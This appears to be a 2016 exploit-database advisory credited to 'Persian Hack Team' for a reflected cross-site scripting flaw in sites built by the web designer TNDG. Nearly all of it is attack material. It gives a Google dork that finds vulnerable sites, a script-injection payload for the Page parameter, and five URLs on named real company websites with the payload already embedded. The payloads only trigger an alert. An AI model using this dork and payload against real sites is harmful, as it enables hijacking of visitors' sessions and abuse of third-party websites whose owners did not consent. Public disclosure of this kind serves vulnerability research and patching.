###################### # Exploit Title : Design by TNDG Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.tndg.com.tw/ # Google Dork : intext:"Design by TNDG" Page= # Date: 2016/02/05 # ###################### # PoC: # Page=[XSS] # Payload = "><script>alert(1);</script> # # http://chuandi.com.tw/ch/product_detial.php?Page=1%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E # http://www.uni-biotech.com/en/news_detail.php?Sn=111&Page=3%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E # http://www.shinystamp.com/en/news_main.php?Page=3%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&Sn=32 # http://www.sundder.com.tw/en/news_01.php?Page=1%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&Sn=32&Sn=18 # http://www.gmaxwheels.com/en/news_main.php?G0=&Sn=10&Page=1%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################